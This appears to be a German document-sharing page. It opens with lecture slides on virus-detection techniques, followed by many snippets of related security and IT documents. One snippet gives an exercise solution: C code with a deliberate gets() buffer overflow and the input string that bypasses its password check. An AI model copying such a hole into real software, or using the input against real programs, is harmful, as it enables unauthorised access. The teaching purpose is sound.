haben AH und BX bei Aufruf des Interrupts? nur durch Emulator zu ermitteln. Grundidee: Identifikation von Merkmalen, die Viren von anderer Software unterscheiden, Suche nach diesen Merkmalen in Dateien, Addition und Wichtung gefundener Merkmale, Entscheidung, ob Virus oder nicht. Vorteil: neue, unbekannte Viren können damit (potentiell) gefunden werden, vollständige Analyse nicht nötig Hauptproblem: zuviele false positives Negative Heuristiken: Suche nach Code, der in Viren garantiert nicht vorkommt (z.b. Dialogboxen) Spektrale Analyse: Histogramm der in einem Programm befindlichen Instruktionen 87 / / 95 Virentypische Merkmale (Auswahl) Integritätsprüfungen Junk Code Dekryptoren Selbstmodifizierender Code virustypischer Code Beispiel: Suche nach dem Marker des PE-Binärformats cmp ax, "MZ" Instruktionen, die der Compiler nicht generiert Ausführung startet am Ende einer Datei (Sprung dahin) Manipulation von Interruptvektoren (MS-DOS) Nutzung undokumentierter Funktionen Zeichenketten mit Obszönitäten ;-) Idee: Viren modifizieren Dateien (Ausnahme?) Bildung einer Checksumme über jeder uninfizierten Datei, Speicherung der Checksumme in Datenbank, späterer Vergleich gespeicherter mit aktueller Checksumme. Realisierungsmöglichkeiten:. externes Programm, periodischer Aufruf, 2. Selbsttest in ausführbaren Dateien, 3. impliziter Test durch OS beim Aufruf (Integrity Shell) 89 / 95 9 / 95 5

16 Integritätsprüfungen Bewertung Behavior Blockers/Monitors Idee: Beobachtung der Aktivität von Prozessen und Blockierung/Meldung von verdächtigen Aktivitäten für bekannte und unbekannte Viren möglich Detektion erst nach Infektion unmöglich, in legal modifizierten oder neuen Dateien Viren zu finden Ursache der Infektion nicht ermittelbar keine Virusidentifikation Datenbank ist ein bevorzugtes Angriffsziel von Retroviren erlaubt potentiell die Ausführung eines Virus Verschlüsselung von Viren wirkungslos nur relevante Operationen beobachten (Aufwand!), z.b. I/O, Systemrufe nachteilig: Payload wird u. U. ausgeführt Beispiel einer verdächtigen Aktion:. Öffnen einer Binärdatei zum Lesen und Schreiben 2. Einlesen des Teils des File Headers, der Startadresse enthält 3. Schreiben des zuvor eingelesenen Teils 4. Seek zum Ende der Datei und Append-Operation 9 / / 95 Dynamische Signaturen Emulation Idee: Ableitung von Signaturen aus der Sequenz relevanter Systemereignisse (z. B. Systemrufe) und Anwendung der statischen Suchverfahren open open read write read write read write close close Syscall Trace open, open, read open, read, write read, write, read write, read, write read, write, close write, close, close dynamische Signaturen (k=3) open, open open, read read, write write, read write, close close, close dynamische Signaturen (k=2) Idee: Code Nutzung eines CPU-Simulators, um Viruscode ungefährdet ausführen zu können innerhalb der Anti-Viren-Software komplexer Code zu verstehen Abbildung: Beispiel (kurzer) dynamischer Signaturen 93 / / 95 Was haben wir gelernt? Techniken der Virusdetektion Scanning Exakte Identifikation Statische Heuristiken Integritätsprüfungen Emulation Nur die Kombination aller Techniken ist erfolgversprechend. 95 / 95 6

MALWARE AM BEISPIEL VON STUXNET

MALWARE AM BEISPIEL VON STUXNET MALWARE AM BEISPIEL VON STUXNET IAV10/12 24.05.2011 Jan Heimbrodt Inhalt 1. Definition Was ist Malware? 2. Kategorisierung von Malware Viren, Würmer, Trojaner, 3. Was macht Systeme unsicher? Angriffsziele,

Mehr

Datenschutz. Schutz von Personen und Unternehmungen vor dem Missbrauch ihrer Daten. organisatorische Datenschutzmassnahmen

Datenschutz. Schutz von Personen und Unternehmungen vor dem Missbrauch ihrer Daten. organisatorische Datenschutzmassnahmen Datenschutz Schutz von Personen und Unternehmungen vor dem Missbrauch ihrer Daten. organisatorische Datenschutzmassnahmen gesetzliche Datenschutzmassnahmen www.datenschutz.ch K4.4 Datensicherheit - Datenschutz

Mehr

Computerviren. Institut fr Computerwissenschaften. Mihajlovic Roland rmihajlo@cosy.sbg.ac.at Reischmann Stefan sreisch@cosy.sbg.ac.

Computerviren. Institut fr Computerwissenschaften. Mihajlovic Roland rmihajlo@cosy.sbg.ac.at Reischmann Stefan sreisch@cosy.sbg.ac. Computerviren Mihajlovic Roland rmihajlo@cosy.sbg.ac.at Reischmann Stefan sreisch@cosy.sbg.ac.at Institut fr Computerwissenschaften Computerviren p.1/18 Der I LOVE YOU Virus Computerviren p.2/18 Geschichte

Mehr

Cyber Defense MALWARE SIGNATUREN. Dipl.-Inform. Julian Dammann Dipl.-Inform. Peter Weidenbach

Cyber Defense MALWARE SIGNATUREN. Dipl.-Inform. Julian Dammann Dipl.-Inform. Peter Weidenbach MALWARE SIGNATUREN Dipl.-Inform. Julian Dammann Dipl.-Inform. Peter Weidenbach julian.dammann@fkie.fraunhofer.de, peter.weidenbach@fkie.fraunhofer.de Cyber Defense MALWARE SIGNATUREN 1. Signaturen Allgemein

Mehr

Viren - Wie sicher ist Mobile Commerce? Patrick Heinen Systems Engineer Symantec (Deutschland) GmbH

Viren - Wie sicher ist Mobile Commerce? Patrick Heinen Systems Engineer Symantec (Deutschland) GmbH Viren - Wie sicher ist Mobile Commerce? Patrick Heinen s Engineer (Deutschland) GmbH 1 Inhalt Viren, Würmer und Trojaner Definition Funktion Typen Geschichte Virenscannern - Abwehrmechanismen Anforderungen

Mehr

Master-Boot-Record sichern

Master-Boot-Record sichern Master-Boot-Record sichern Allgemeines Mit dem Master-Boot-Record (MBR) kommt der normale Computernutzer nur selten in Kontakt, eigentlich nur zweimal. Bei der Installation von Linux wird in der Regel

Mehr

Hauptseminar Malicious Code: Viren, Würmer und Co.

Hauptseminar Malicious Code: Viren, Würmer und Co. Hauptseminar Malicious Code: Viren, Würmer und Co. Statische Programmanalyse Matthias Langhammer Technische Universität München,langhamm@in.tum.de Zusammenfassung Um ihre Existenz zu verschleiern enthalten

Mehr

Personal Firewall (PFW) und Virenscanner. Präsentation von Gunawati A.-Tillmann, Miguel Lopez und Andreas Angelkorte

Personal Firewall (PFW) und Virenscanner. Präsentation von Gunawati A.-Tillmann, Miguel Lopez und Andreas Angelkorte Personal Firewall (PFW) und Virenscanner Präsentation von Gunawati A.-Tillmann, Miguel Lopez und Andreas Angelkorte Gliederung Personal Firewall Virenscanner 1. Zweck einer Firewall 2. Funktionsweise einer

Mehr

Computerviren, Würmer, Trojaner

Computerviren, Würmer, Trojaner Computerviren, Würmer, Trojaner Computerviren, Würmer und Trojaner zählen zur Familie unerwünschter bzw. schädlicher Programme, der so genannten Malware. Diese Programme können sich selbst verbreiten und

Mehr

Sicherheit. Bedeutung Gefahren. Mag. Friedrich Wannerer 1

Sicherheit. Bedeutung Gefahren. Mag. Friedrich Wannerer 1 Sicherheit Bedeutung Gefahren Mag. Friedrich Wannerer 1 Sicherheitsbegriff Unversehrtheit und Vertraulichkeit persönlicher Daten Datenschutzgesetz 2000 Bedrohungen q Dialer, Spam, Spyware, Viren, Würmer,

Mehr

Vorlesung Informationssicherheit

Vorlesung Informationssicherheit 1 / 84 Vorlesung Informationssicherheit Thema 5: Bösartige Software Robert Baumgartl 24. Juni 2015 Überblick Bösartige Software Wirtsprogramm nötig unabhängig Hintertüren Logische Bomben Viren Würmer Trojanische

Mehr

Advanced Encryption Standard. Copyright Stefan Dahler 20. Februar 2010 Version 2.0

Advanced Encryption Standard. Copyright Stefan Dahler 20. Februar 2010 Version 2.0 Advanced Encryption Standard Copyright Stefan Dahler 20. Februar 2010 Version 2.0 Vorwort Diese Präsentation erläutert den Algorithmus AES auf einfachste Art. Mit Hilfe des Wissenschaftlichen Rechners

Mehr

Sicherheit im Internet 1: Viren, Würmer und Trojaner. Viren, Würmer und Trojaner. Virenlawine. Weiterbildungsveranstaltung des PING e.v.

Sicherheit im Internet 1: Viren, Würmer und Trojaner. Viren, Würmer und Trojaner. Virenlawine. Weiterbildungsveranstaltung des PING e.v. Virenlawine Sicherheit im Internet 1: FAZ 2003-06-06 FAZ 2003-08-22 Weiterbildungsveranstaltung des PING e.v. Daniel Borgmann und Dr. med. Arthur Pranada FAZ 2004-06-04 FAZ 2004-06-05 Donnerstag, 24. November

Mehr

Reverse Cloud. Michael Weisgerber. Channel Systems Engineer DACH September 2013

Reverse Cloud. Michael Weisgerber. Channel Systems Engineer DACH September 2013 Reverse Cloud Michael Weisgerber Channel Systems Engineer DACH September 2013 Öffentliche Wahrnehmung - heute Flame Duqu Stuxnet Page 2 2011 Palo Alto Networks. Proprietary and Confidential. Öffentliche

Mehr

IT-Sicherheit. Informationssicherheit: IT-Sicherheit bzw. IT-Risikomanagement

IT-Sicherheit. Informationssicherheit: IT-Sicherheit bzw. IT-Risikomanagement IT-Sicherheit Informationssicherheit: Schutz aller Informationen im Unternehmen elektronisch gespeicherte Daten Informationen in nichtelektronischer Form z.b. auf Papier Expertenwissen, in den Köpfen der

Mehr

Allgemeine Hintergrundinformation über Viren

Allgemeine Hintergrundinformation über Viren Allgemeine Hintergrundinformation über Viren Allgemeine Hintergrundinformation über Viren 1. Was ist ein Virus? Ein Computervirus ist ein Programm oder eine Folge von Anweisungen, mit dem Ziel sich zu

Mehr

Malware - Viren, Würmer und Trojaner

Malware - Viren, Würmer und Trojaner Department of Computer Sciences University of Salzburg June 21, 2013 Malware-Gesamtentwicklung 1984-2012 Malware-Zuwachs 1984-2012 Malware Anteil 2/2011 Malware Viren Würmer Trojaner Malware Computerprogramme,

Mehr

Dynamische Web-Anwendung

Dynamische Web-Anwendung Dynamische Web-Anwendung Christiane Lacmago Seminar Betriebssysteme und Sicherheit Universität Dortmund WS 02/03 Gliederung Einleitung Definition und Erläuterung Probleme der Sicherheit Ziele des Computersysteme

Mehr

Softwarepraktikum: Einführung in Makefiles

Softwarepraktikum: Einführung in Makefiles Softwarepraktikum: Einführung in Makefiles (Eingebettete Systeme und Robotik),, http://ai3.inf.uni-bayreuth.de /home/db_lehre/praktika/softwarepraktikum/vorbesprechung_und_einfuehrung/vortraege/makefile_tuto

Mehr

Aufgabe 3 Storm-Worm

Aufgabe 3 Storm-Worm Aufgabe 3 Storm-Worm Bot: kompromittierte Maschine Kommunikationskanal, der dem Angreifer die Kontrolle über den Bot und somit das System gestattet Botnetz: Zusammenschluss mehrerer Bots koordinierte Distributed-Denial-Of-Service-Angriffe

Mehr

Formatting the TrekStor i.beat run

Formatting the TrekStor i.beat run DE EN Formatting the TrekStor i.beat run Formatierung des TrekStor i.beat run a Beim Formatieren werden ALLE Daten auf dem MP3-Player gelöscht. In diesem Abschnitt wird Ihnen erläutert, wie Sie Ihren MP3-Player

Mehr

USB Treiber updaten unter Windows 7/Vista

USB Treiber updaten unter Windows 7/Vista USB Treiber updaten unter Windows 7/Vista Hinweis: Für den Downloader ist momentan keine 64 Bit Version erhältlich. Der Downloader ist nur kompatibel mit 32 Bit Versionen von Windows 7/Vista. Für den Einsatz

Mehr

Grundlagen der Informatik. Prof. Dr. Stefan Enderle NTA Isny

Grundlagen der Informatik. Prof. Dr. Stefan Enderle NTA Isny Grundlagen der Informatik Prof. Dr. Stefan Enderle NTA Isny 2 Datenstrukturen 2.1 Einführung Syntax: Definition einer formalen Grammatik, um Regeln einer formalen Sprache (Programmiersprache) festzulegen.

Mehr

5.2 Analyse des File Slack

5.2 Analyse des File Slack 5.2 Analyse des File Slack 109 Es gibt an vielen Stellen eines Betriebssystems Fundorte für Gebrauchsspuren oder Hinweise auf Auffälligkeiten. Diese Stellen sollten grundsätzlich aufgesucht und analysiert

Mehr

Rootkits: Techniken und Abwehr

Rootkits: Techniken und Abwehr Rootkits: Techniken und Abwehr Von Rootkits eingesetzte Techniken und Methoden zur ihrer Entdeckung und Abwehr DFN Workshop 2003, 26. Februar 2003 Dipl. Inf. Andreas Bunten Gliederung Was sind Rootkits?

Mehr

Effizienz im Vor-Ort-Service

Effizienz im Vor-Ort-Service Installation: Anleitung SatWork Integrierte Auftragsabwicklung & -Disposition Februar 2012 Disposition & Auftragsabwicklung Effizienz im Vor-Ort-Service Disclaimer Vertraulichkeit Der Inhalt dieses Dokuments

Mehr

Handbuch ECDL 2003 Basic Modul 2: Computermanagement und Dateiverwaltung Grundbegriffe: Viren und Daten auf Viren prüfen

Handbuch ECDL 2003 Basic Modul 2: Computermanagement und Dateiverwaltung Grundbegriffe: Viren und Daten auf Viren prüfen Handbuch ECDL 2003 Basic Modul 2: Computermanagement und Dateiverwaltung Grundbegriffe: Viren und Daten auf Viren prüfen Dateiname: ecdl2_06_01_documentation_standard.doc Speicherdatum: 14.02.2005 ECDL

Mehr

1 Linux-Befehlsübersicht

1 Linux-Befehlsübersicht 1 Linux-Befehlsübersicht 1.1 Dateiverwaltung ls Verzeichnisinhalt anzeigen (list) ls -l ausführliche Darstellung ls -a auch versteckte Dateien auisten ls -h verwende besser lesbare Einheiten (humanreadable,

Mehr

Reaktive Sicherheit Teil 4

Reaktive Sicherheit Teil 4 Reaktive Sicherheit Teil 4 Malware Ulrich Flegel Lehrstuhl 6 Informationssysteme und Sicherheit Fachbereich Informatik Universität Dortmund 30. November 2007 c Ulrich Flegel Reaktive Sicherheit Teil 4

Mehr

German English Firmware translation for T-Sinus 154 Access Point

German English Firmware translation for T-Sinus 154 Access Point German English Firmware translation for T-Sinus 154 Access Point Konfigurationsprogramm Configuration program (english translation italic type) Dieses Programm ermöglicht Ihnen Einstellungen in Ihrem Wireless

Mehr

Betriebssysteme K_Kap11B: Files, Filesysteme Datenstrukturen

Betriebssysteme K_Kap11B: Files, Filesysteme Datenstrukturen Betriebssysteme K_Kap11B: Files, Filesysteme Datenstrukturen 1 Files als lineare Liste File angeordnet als verkette Liste von Blöcken Jeder Block enthält Zeiger zum Nachfolger Zeiger = Adresse des Blocks

Mehr

Viren, Würmer, Trojaner

Viren, Würmer, Trojaner Viren, Würmer, Trojaner Was muss ich beachten? Ralf Benzmüller G DATA Software AG Überblick Einleitung Grundlegende Begriffe Gefahrensituation Zahlen und Daten Trends Infektionsmechanismen Viren Würmer

Mehr

Funktionaler Aufbau eines Computers Untersuchung von Delphi-Compilaten

Funktionaler Aufbau eines Computers Untersuchung von Delphi-Compilaten Funktionaler Aufbau eines Computers Im Folgenden soll der Weg untersucht werden, wie ein Programm, das von einem Compiler/Interpreter in Maschinencode übertragen wurde, schließlich vom Prozessor abgearbeitet

Mehr

A9: Mobile Security - So werden Sie angegriffen! Renato Ettisberger renato.ettisberger@switch.ch

A9: Mobile Security - So werden Sie angegriffen! Renato Ettisberger renato.ettisberger@switch.ch A9: Mobile Security - So werden Sie angegriffen! Renato Ettisberger renato.ettisberger@switch.ch Zürich, 11. Oktober 2011 Security (SWITCH-CERT) Derzeit 7 Mitarbeiter, bald 10 Unser Team erbringt Security-Dienstleistungen

Mehr

Exercise (Part II) Anastasia Mochalova, Lehrstuhl für ABWL und Wirtschaftsinformatik, Kath. Universität Eichstätt-Ingolstadt 1

Exercise (Part II) Anastasia Mochalova, Lehrstuhl für ABWL und Wirtschaftsinformatik, Kath. Universität Eichstätt-Ingolstadt 1 Exercise (Part II) Notes: The exercise is based on Microsoft Dynamics CRM Online. For all screenshots: Copyright Microsoft Corporation. The sign ## is you personal number to be used in all exercises. All

Mehr

Linux basierendes NAS auf Seagate Goflex Net installieren. Christian Eppler 21162, Stefan Möbius 21165

Linux basierendes NAS auf Seagate Goflex Net installieren. Christian Eppler 21162, Stefan Möbius 21165 Linux basierendes NAS auf Seagate Goflex Net installieren Christian Eppler 21162, Stefan Möbius 21165 Inhaltsverzeichnis Wieso das Ganze? Nachteile Pogoplug/Debian Vorteile Pogoplug/Debian Wieso diese

Mehr

6.2 FAT32 Dateisystem

6.2 FAT32 Dateisystem 6.2 FAT32 Dateisystem Dateisystem für Windows 98 einige Unterschiede zum Linux-Dateisystem EXT2: keine Benutzeridentifikation für Dateien und Verzeichnisse! Partitionen werden durch Laufwerke repräsentiert,

Mehr

Sucuri Websiteschutz von

Sucuri Websiteschutz von Sucuri Websiteschutz von HostPapa Beugen Sie Malware, schwarzen Listen, falscher SEO und anderen Bedrohungen Ihrer Website vor. HostPapa, Inc. 1 888 959 PAPA [7272] +1 905 315 3455 www.hostpapa.com Malware

Mehr

Aufbau einer Testumgebung mit VMware Server

Aufbau einer Testumgebung mit VMware Server Aufbau einer Testumgebung mit VMware Server 1. Download des kostenlosen VMware Servers / Registrierung... 2 2. Installation der Software... 2 2.1 VMware Server Windows client package... 3 3. Einrichten

Mehr

Avira Professional / Server Security. Date

Avira Professional / Server Security. Date Date Agenda Wozu benötige ich einen Virenschutz für Workstations/Server? Systemanforderungen der Avira Professional Security Was bietet die Avira Professional Security? Systemanforderungen der Avira Professional

Mehr

Buffer Overflow 1c) Angriffsstring: TTTTTTTTTTTTTTTT (16x) Beachte: Padding GCC-Compiler Zusatz: gcc O2 verhindert hier den Angriff (Code Optimierung)

Buffer Overflow 1c) Angriffsstring: TTTTTTTTTTTTTTTT (16x) Beachte: Padding GCC-Compiler Zusatz: gcc O2 verhindert hier den Angriff (Code Optimierung) Buffer Overflow 1c) 1 char passok='f'; 2 char password[8]; 3 printf( Passwort: ); 4 gets(password); 5 if(!strcmp(password, daspassw )){passok = 'T';} 6 if(passok=='t'){printf( %s, Willkommen! );} 7 else

Mehr

Instruktionssatz-Architektur

Instruktionssatz-Architektur Institut für Informatik 3: Rechnerarchitektur Friedrich-Alexander-Universität Erlangen-Nürnberg WS 2005/2006 Übersicht 1 Einleitung 2 Bestandteile der ISA 3 CISC / RISC Übersicht 1 Einleitung 2 Bestandteile

Mehr

Programmierung und Modellierung

Programmierung und Modellierung Programmierung und Modellierung Terme, Suchbäume und Pattern Matching Martin Wirsing in Zusammenarbeit mit Moritz Hammer SS 2009 2 Inhalt Kap. 7 Benutzerdefinierte Datentypen 7. Binärer Suchbaum 8. Anwendung:

Mehr

MySQL Queries on "Nmap Results"

MySQL Queries on Nmap Results MySQL Queries on "Nmap Results" SQL Abfragen auf Nmap Ergebnisse Ivan Bütler 31. August 2009 Wer den Portscanner "NMAP" häufig benutzt weiss, dass die Auswertung von grossen Scans mit vielen C- oder sogar

Mehr

Beispiel 2a Die eigenen ersten Schritte mit dem Gnu-Debugger GDB für Remote-Debugging

Beispiel 2a Die eigenen ersten Schritte mit dem Gnu-Debugger GDB für Remote-Debugging Beispiel 2a Die eigenen ersten Schritte mit dem Gnu-Debugger GDB für Remote-Debugging Das Beispiel orientiert sich am selben Code, der im Teil 1 der Serie verwendet wurde. Text Styles: Shell Prompt mit

Mehr

Desktop Personal Firewall und Virenscanner

Desktop Personal Firewall und Virenscanner Desktop Personal Firewall und Virenscanner Desktop Personal Firewall Was ist eine Firewall und wie kann diese unterschieden werden? Wie funktioniert eine Firewall? Was ist zu beachten? Virenscanner Was

Mehr

Computer Virologie. Viren, Würmer und Trojaner. (auf der Basis einer Projektarbeit von Bastian Beyer ) Dortmund, Oktober 2004

Computer Virologie. Viren, Würmer und Trojaner. (auf der Basis einer Projektarbeit von Bastian Beyer ) Dortmund, Oktober 2004 Computer Virologie Viren, Würmer und Trojaner (auf der Basis einer Projektarbeit von Bastian Beyer ) Dortmund, Oktober 2004 Prof. Dr. Heinz-Michael Winkels, Fachbereich Wirtschaft FH Dortmund Emil-Figge-Str.

Mehr

Gibt Daten im erweiterten Format aus. Dies beinhaltet die Angabe von Zugriffsrechten, Besitzer, Länge, Zeitpunkt der letzten Änderung und mehr.

Gibt Daten im erweiterten Format aus. Dies beinhaltet die Angabe von Zugriffsrechten, Besitzer, Länge, Zeitpunkt der letzten Änderung und mehr. ls [optionen] [namen]: ls zeigt den Inhalt von Verzeichnissen. Sind keine namen angegeben, werden die Dateien im aktuellen Verzeichnis aufgelistet. Sind eine oder mehrere namen angegeben, werden entweder

Mehr

Aber genau deshalb möchte ich Ihre Aufmehrsamkeit darauf lenken und Sie dazu animieren, der Eventualität durch geeignete Gegenmaßnahmen zu begegnen.

Aber genau deshalb möchte ich Ihre Aufmehrsamkeit darauf lenken und Sie dazu animieren, der Eventualität durch geeignete Gegenmaßnahmen zu begegnen. NetWorker - Allgemein Tip 618, Seite 1/5 Das Desaster Recovery (mmrecov) ist evtl. nicht mehr möglich, wenn der Boostrap Save Set auf einem AFTD Volume auf einem (Data Domain) CIFS Share gespeichert ist!

Mehr

Laufwerk-Verschlüsselung mit BitLocker

Laufwerk-Verschlüsselung mit BitLocker Laufwerk-Verschlüsselung mit Microsoft BitLocker 1 Allgemeine Informationen... 3 1.1 Informationen zu diesem Dokument... Fehler! Textmarke nicht definiert. 1.1.1. Version und Änderungen... Fehler! Textmarke

Mehr

ReadMe zur Installation der BRICKware for Windows, Version 6.1.2. ReadMe on Installing BRICKware for Windows, Version 6.1.2

ReadMe zur Installation der BRICKware for Windows, Version 6.1.2. ReadMe on Installing BRICKware for Windows, Version 6.1.2 ReadMe zur Installation der BRICKware for Windows, Version 6.1.2 Seiten 2-4 ReadMe on Installing BRICKware for Windows, Version 6.1.2 Pages 5/6 BRICKware for Windows ReadMe 1 1 BRICKware for Windows, Version

Mehr

Programmieren in C. Operatoren, Variablen und deren Sichtbarkeit. Prof. Dr. Nikolaus Wulff

Programmieren in C. Operatoren, Variablen und deren Sichtbarkeit. Prof. Dr. Nikolaus Wulff Programmieren in C Operatoren, Variablen und deren Sichtbarkeit Prof. Dr. Nikolaus Wulff Auswertung von Ausdrücken Was passiert wenn ein Ausdruck wie z. B. int y,x=2; y = ++x * x++; im Computer abgearbeitet

Mehr

Gerd Armbruster Gerd.Armbruster@GMX.De

Gerd Armbruster Gerd.Armbruster@GMX.De Viren, Trojaner & Hacker - so schützen Sie Ihren PC Gerd Armbruster Gerd.Armbruster@GMX.De 100 Mio Sony Kunden gehackt Aktuell Alles 2011 Immer noch 2011 Geschäftsmodell Agenda! Sicherheit im Internet!

Mehr

Next Generation Firewall: Security & Operation Intelligence

Next Generation Firewall: Security & Operation Intelligence Next Generation Firewall: Security & Operation Intelligence Umfassend über unterschiedliche Infrastrukturbereiche (P, DC, RA) Flexible Umsetzung: unterschiedliche Topologien & Plattformen Eine Richtlinie:

Mehr

Betriebssysteme WS 2012/13 Peter Klingebiel, DVZ. Zusammenfassung Kapitel 4 - Datenträger/Dateiverwaltung

Betriebssysteme WS 2012/13 Peter Klingebiel, DVZ. Zusammenfassung Kapitel 4 - Datenträger/Dateiverwaltung Betriebssysteme WS 2012/13 Peter Klingebiel, DVZ Zusammenfassung Kapitel 4 - Datenträger/Dateiverwaltung Zusammenfassung Kapitel 4 Dateiverwaltung 1 Datei logisch zusammengehörende Daten i.d.r. permanent

Mehr

Technical Support Information No. 123 Revision 2 June 2008

Technical Support Information No. 123 Revision 2 June 2008 I IA Sensors and Communication - Process Analytics - Karlsruhe, Germany Page 6 of 10 Out Baking Of The MicroSAM Analytical Modules Preparatory Works The pre-adjustments and the following operations are

Mehr

XV1100K(C)/XV1100SK(C)

XV1100K(C)/XV1100SK(C) Lexware Financial Office Premium Handwerk XV1100K(C)/XV1100SK(C) All rights reserverd. Any reprinting or unauthorized use wihout the written permission of Lexware Financial Office Premium Handwerk Corporation,

Mehr

Sicherheitsaspekte unter Windows 2000

Sicherheitsaspekte unter Windows 2000 Sicherheitsaspekte unter Windows 2000 Margarete Kudak Sascha Wiebesiek 1 Inhalt 1. Sicherheit 1.1 Definition von Sicherheit 1.2 C2 - Sicherheitsnorm 1.3 Active Directory 2. Sicherheitslücken 3. Verschlüsselung

Mehr

1.7 Assembler Programmierung

1.7 Assembler Programmierung 1.7 Assembler Programmierung Die nach außen sichtbare Programmierschnittstelle eines Prozessors ist der Befehlscode. Dies ist eine binäre Dateninformation, die vom Prozessor Byte für Byte abgearbeitet

Mehr

Benutzerhandbuch bintec R4100 / R4300 Configuration Management. Copyright 17. Juli 2006 Funkwerk Enterprise Communications GmbH Version 1.

Benutzerhandbuch bintec R4100 / R4300 Configuration Management. Copyright 17. Juli 2006 Funkwerk Enterprise Communications GmbH Version 1. Benutzerhandbuch bintec R4100 / R4300 Configuration Management Copyright 17. Juli 2006 Funkwerk Enterprise Communications GmbH Version 1.0 Ziel und Zweck Haftung Marken Copyright Richtlinien und Normen

Mehr

Departement Wirtschaft. IT Forensics in action against malicious Software of the newest generation

Departement Wirtschaft. IT Forensics in action against malicious Software of the newest generation Departement Wirtschaft IT Forensics in action against malicious Software of the newest generation Dipl. Ing. Uwe Irmer IT Security- Schnappschüsse 2 Malware der neuesten Generation Professionalität- wer

Mehr

USB-Stick (USB-Stick größer 4G. Es ist eine größere Partition notwendig als die eines 4GB Rohlings, der mit NTFS formatiert wurde)

USB-Stick (USB-Stick größer 4G. Es ist eine größere Partition notwendig als die eines 4GB Rohlings, der mit NTFS formatiert wurde) Colorfly i106 Q1 System-Installations-Tutorial Hinweise vor der Installation / Hit for preparation: 准 备 事 项 : 外 接 键 盘 ( 配 套 的 磁 吸 式 键 盘 USB 键 盘 通 过 OTG 插 发 射 器 的 无 线 键 盘 都 可 ); U 盘 ( 大 于 4G 的 空 白 U 盘,

Mehr

Digital Forensics. Slackspace. 2011 DI Robert Jankovics DI Martin Mulazzani

Digital Forensics. Slackspace. 2011 DI Robert Jankovics DI Martin Mulazzani Digital Forensics Slackspace Slackspace Übersicht: Slack allgemein NTFS Slack FAT Slack mit Steganographie Slack allgemein Slack Space: Bezeichnet den Speicherplatz zwischen Ende der Datei und Ende des

Mehr

Aktuelle Probleme der IT Sicherheit

Aktuelle Probleme der IT Sicherheit Aktuelle Probleme der IT Sicherheit DKE Tagung, 6. Mai 2015 Prof. Dr. Stefan Katzenbeisser Security Engineering Group & CASED Technische Universität Darmstadt skatzenbeisser@acm.org http://www.seceng.de

Mehr

Rechteausweitung mittels Antivirensoftware

Rechteausweitung mittels Antivirensoftware Rechteausweitung mittels Antivirensoftware Eine Schwachstelle in der Softwarekomponente McAfee Security Agent, die unter anderem Bestandteil der Antivirensoftware McAfee VirusScan Enterprise ist, kann

Mehr

Ich hatte die Absicht, mir eine Bart- CD ausschließlich zur Datenrettung zu erstellen - und diese möglichst mit Deutscher Oberfläche.

Ich hatte die Absicht, mir eine Bart- CD ausschließlich zur Datenrettung zu erstellen - und diese möglichst mit Deutscher Oberfläche. Ich hatte die Absicht, mir eine Bart- CD ausschließlich zur Datenrettung zu erstellen - und diese möglichst mit Deutscher Oberfläche. Ich wollte einbinden: - Nero, meine v6.6.1.4 - Totalcommander, meine

Mehr

PIWIN 1 Übung Blatt 5

PIWIN 1 Übung Blatt 5 Fakultät für Informatik Wintersemester 2008 André Gronemeier, LS 2, OH 14 Raum 307, andre.gronemeier@cs.uni-dortmund.de PIWIN 1 Übung Blatt 5 Ausgabedatum: 19.12.2008 Übungen: 12.1.2009-22.1.2009 Abgabe:

Mehr

Einführung in die Programmiersprache C

Einführung in die Programmiersprache C Einführung in die Programmiersprache C 10 Sicheres Programmieren Alexander Sczyrba Robert Homann Georg Sauthoff Universität Bielefeld, Technische Fakultät Literatur Klein, Buffer Overflows und Format-String-Schwachstellen.

Mehr

wir haben Ihnen, nachfolgend, einen Guide zusammengestellt, um Ihnen Unterstützung für Ihre Rechnerpflege zu geben.

wir haben Ihnen, nachfolgend, einen Guide zusammengestellt, um Ihnen Unterstützung für Ihre Rechnerpflege zu geben. Netzwerke Linux und Windows Software / Hardware / Server IT-Service / Programmierung Individuelle Beratung Boxhorn-EDV GbR Baierbrunner Str. 3 D-81379 München Boxhorn-EDV GbR Baierbrunner Str. 3 D-81379

Mehr

Python Programmierung. Dipl.-Ing.(FH) Volker Schepper

Python Programmierung. Dipl.-Ing.(FH) Volker Schepper Python Programmierung Kontaktdaten Homepage: http://wwwlehre.dhbw-stuttgart.de/~schepper/ Email: Volker. Schepper [A@T] yahoo.de Vorlesung Skriptsprachen Vorlesung: 06.03.2013 13.03.2013 20.03.2013 27.03.2013

Mehr

Ein Vortrag von Marko Rogge. Hacking Security Journalismus

Ein Vortrag von Marko Rogge. Hacking Security Journalismus Ein Vortrag von Marko Rogge Hacking Security Journalismus Einführung Penetration Tests sind professionell und legal durchgeführte Sicherheitsüberprüfungen, die nach den Anforderungen des Unternehmers zur

Mehr

BLK-2000. Quick Installation Guide. English. Deutsch

BLK-2000. Quick Installation Guide. English. Deutsch BLK-2000 Quick Installation Guide English Deutsch This guide covers only the most common situations. All detail information is described in the user s manual. English BLK-2000 Quick Installation Guide

Mehr

FAQ Häufig gestellte Fragen

FAQ Häufig gestellte Fragen FAQ Häufig gestellte Fragen FAQ zu HitmanPro.Kickstart Seite 1 Inhaltsverzeichnis Einführung in HitmanPro.Kickstart... 3 F-00: Wozu wird HitmanPro.Kickstart benötigt?... 4 F-01: Kann HitmanPro.Kickstart

Mehr

Sophos Virenscanner Konfiguration

Sophos Virenscanner Konfiguration Ersteller/Editor Ulrike Hollermeier Änderungsdatum 12.05.2014 Erstellungsdatum 06.07.2012 Status Final Konfiguration Rechenzentrum Uni Regensburg H:\Sophos\Dokumentation\Sophos_Konfiguration.docx Uni Regensburg

Mehr

Virenschutz für SAP E-Recruiting

Virenschutz für SAP E-Recruiting Virenschutz für SAP E-Recruiting ein White-Paper E-Recruiting der Trend im Personalmarkt Viele Unternehmen realisieren mit dem Einsatz moderner E-Recruiting Technologie signifikante Einsparungen im Bereich

Mehr

1CONFIGURATION MANAGEMENT

1CONFIGURATION MANAGEMENT 1CONFIGURATION MANAGEMENT Copyright 11. Februar 2005 Funkwerk Enterprise Communications GmbH Bintec Benutzerhandbuch - VPN Access Reihe Version 1.0 Ziel und Zweck Haftung Marken Copyright Richtlinien und

Mehr

G Data Whitepaper. Behaviour Blocking. Geschützt. Geschützter. G Data. Marco Lauerwald Marketing

G Data Whitepaper. Behaviour Blocking. Geschützt. Geschützter. G Data. Marco Lauerwald Marketing G Data Whitepaper Behaviour Blocking Marco Lauerwald Marketing Geschützt. Geschützter. G Data. Inhalt 1 Behaviour Blocking Mission: Unbekannte Bedrohungen bekämpfen... 2 1.1 Unbekannte Schädlinge: Die

Mehr

cs106 Informatiklabor Teil 1: Java-Installation

